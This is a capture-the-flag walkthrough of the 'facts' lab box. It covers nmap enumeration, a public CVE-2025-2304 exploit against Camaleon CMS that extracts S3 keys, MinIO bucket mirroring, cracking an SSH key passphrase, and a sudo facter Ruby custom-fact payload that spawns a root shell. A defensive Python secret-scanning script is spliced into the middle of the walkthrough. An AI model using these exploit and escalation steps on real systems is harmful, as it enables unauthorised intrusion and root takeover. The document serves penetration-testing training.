facts.htb
10.10.10.10
The first step was to perform a full service enumeration using Nmap.
nmap -p22,80,54321 -T4 -Pn -A 10.10.10.10
-p22,80,54321 → scan specific ports
-T4 → faster scan timing
-Pn → skip host discovery
-A → OS detection, version detection, scripts, traceroute
Output:
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
54321/tcp open  http    Golang net/http server
Port 22: OpenSSH 9.9p1 Ubuntu, so SSH access is available.
Port 80: nginx 1.26.3 with the page title "facts", so a web application is hosted on port 80.
Port 54321: the HTTP response carries the header Server: MinIO.
The response contained XML errors from MinIO, which is an S3-compatible object storage server.
Example response:
<Error>
<Code>InvalidRequest</Code>
<Message>Invalid Request (invalid argument)</Message>
</Error>
This suggests that the service on port 54321 is a MinIO object storage server.
Navigating to:
http://facts.htb
We discovered the website and began exploring its functionality.
Eventually, an admin endpoint was discovered which allowed user registration.
After creating an account and logging in, we analyzed the application.
Inside the admin panel we discovered that the application was running:
Camaleon CMS 2.9.0
This version is affected by CVE-2025-2304.
Exploit reference:
https://github.com/Alien0ne/CVE-2025-2304
This vulnerability allows authenticated privilege escalation.
We downloaded the exploit and executed it.
Command used:
python3 exploit.py -u http://facts.htb/ -U abc -P abc
[+] Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+] Login confirmed
User ID: 6
Current User Role: client
[+] Loading privilege escalation
User ID: 6
Updated User Role: admin
[+] Extracting S3 Credentials
s3 access key: AKIA359692191D12012C
s3 secret key: Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB
s3 endpoint: http://localhost:54321
[+] Reverting User Role
The exploit revealed S3 credentials:
Access Key : AKIA359692191D12012C
Secret Key : Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB
Endpoint : http://localhost:54321
Since the endpoint is MinIO, we can connect to it.
To interact with MinIO we used the MinIO client (mc).
wget https://dl.min.io/client/mc/release/linux-amd64/mc
chmod +x mc
sudo mv mc /usr/local/bin/
mc alias set facts http://facts.htb:54321 \
AKIA359692191D12012C \
Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB
Successful connection message:
Added 'facts' successfully
Now we list available buckets.
mc ls facts
Output:
internal
randomfacts
These are S3 buckets.
We mirrored the buckets locally.
mc mirror facts/internal .
mc mirror facts/randomfacts .
Inside the internal bucket we found:
internal/.ssh
Listing files:
ls
Output:
authorized_keys
id_ed25519
Viewing the private key:
cat id_ed25519
Output:
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
This key was passphrase-protected.
First we converted the key to a hash format that John the Ripper can process.
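As an added defender-side example (not part of the original writeup): a Python audit script for a directory mirrored with mc, looking for the two kinds of secret this box leaked, OpenSSH private keys (reading the openssh-key-v1 header to report whether the key is passphrase-protected) and AKIA-style access key ids. sample_key builds a constructed, header-only fixture so the block runs offline; scan_tree is the entry point for a real mirrored bucket directory.

```python
import base64, re, struct
from pathlib import Path

OPENSSH_MAGIC = b"openssh-key-v1\x00"
PEM_RE = re.compile(rb"-----BEGIN OPENSSH PRIVATE KEY-----\s*(.*?)\s*-----END OPENSSH PRIVATE KEY-----", re.S)
AKIA_RE = re.compile(rb"\bAKIA[0-9A-Z]{16}\b")  # access key ids shaped like the one leaked on this box

def _ssh_string(b: bytes) -> bytes:  # length-prefixed string, the openssh-key-v1 building block
    return struct.pack(">I", len(b)) + b

def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def openssh_key_header(pem: bytes):
    """Return (ciphername, kdfname) from an openssh-key-v1 PEM block, else None."""
    m = PEM_RE.search(pem)
    if not m:
        return None
    blob = base64.b64decode(b"".join(m.group(1).split()))
    if not blob.startswith(OPENSSH_MAGIC):
        return None
    cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
    kdf, _ = _read_string(blob, off)
    return cipher.decode(), kdf.decode()

def scan_bytes(data: bytes) -> list:
    """Findings for one object's contents; secret material is never echoed."""
    findings = []
    hdr = openssh_key_header(data)
    if hdr:  # cipher "none" means the key file is stored without a passphrase
        cipher, kdf = hdr
        state = "UNENCRYPTED" if cipher == "none" else f"encrypted ({cipher}/{kdf})"
        findings.append(f"openssh private key, {state}")
    for m in AKIA_RE.finditer(data):
        findings.append(f"access key id {m.group(0)[:8].decode()}...")
    return findings

def scan_tree(root: str) -> dict:
    """Walk a directory produced by `mc mirror` and return {path: findings}."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and (found := scan_bytes(p.read_bytes())):
            report[str(p)] = found
    return report

def sample_key(cipher: bytes, kdf: bytes) -> bytes:
    """Constructed fixture: header-only openssh-key-v1 blob, not a usable key."""
    body = OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(b"") + struct.pack(">I", 1)
    return b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(body) + b"\n-----END OPENSSH PRIVATE KEY-----\n"
```

Run scan_tree over the directory you mirrored the bucket into; any hit is a reason to rotate the credential and remove the object, whether or not the key was encrypted.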
ssh2john id_ed25519 > hash.txt
Then we cracked it using the rockyou wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Output:
dragonballz (id_ed25519)
The passphrase is:
dragonballz
We still needed the username.
We used the following command:
ssh-keygen -y -f id_ed25519
Output:
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHjKR303Vqlu4EvRQ1VbcaRrxyFbkiuAr8si3qgLU3Sh trivia@facts.htb
Important observation:
trivia@facts.htb
This suggests the username is:
trivia
We connected using the private key.
ssh -i id_ed25519 trivia@facts.htb
Enter passphrase:
dragonballz
Successful login:
Welcome to Ubuntu 25.04
Checking user:
whoami
Output:
trivia
Navigating to William's directory:
cd /home/william
ls
Output:
user.txt
After obtaining a shell as trivia, privilege escalation was possible via facter.
The binary /usr/bin/facter could be executed with sudo, and its --custom-dir option loads custom Ruby facts from a directory of the caller's choosing.
Because the Ruby code in a custom fact runs with facter's privileges, this allows arbitrary command execution as root.
mkdir /tmp/facts
nano /tmp/facts/root.rb
Insert the following code:
Facter.add(:pwned) do
  setcode do
    exec('/bin/bash')
  end
end
Save and exit.
sudo /usr/bin/facter --custom-dir /tmp/facts pwned
Expected result:
root@facts:/tmp#
Terminal output:
trivia@facts:/tmp$ mkdir /tmp/facts
trivia@facts:/tmp$ nano /tmp/facts/root.rb
trivia@facts:/tmp$ sudo /usr/bin/facter --custom-dir /tmp/facts pwned
root@facts:/tmp# whoami
root
Verify root privileges:
id
Output:
uid=0(root) gid=0(root)
Navigate to root directory:
cd /root
ls -la
Output:
-rw-r----- 1 root root 33 Mar 11 07:18 root.txt
Retrieve flag:
cat root.txt
Attack chain:
Nmap Scan → Web Enumeration → Camaleon CMS 2.9.0 → CVE-2025-2304 Exploit → Extract S3 Credentials → Access MinIO
→ Download internal bucket → Retrieve SSH private key → Crack key passphrase → SSH as trivia → Capture user flag
→ Facter custom Ruby fact exploit → Root shell → Capture root flag
Camaleon CMS 2.9.0 allowed authenticated users to escalate privileges.
The application stored S3 credentials that an escalated user could extract, allowing access to MinIO.
The object storage bucket contained an SSH private key.
The SSH key was protected only by a weak passphrase (dragonballz).
facter, runnable via sudo, allowed loading custom Ruby code, enabling root command execution.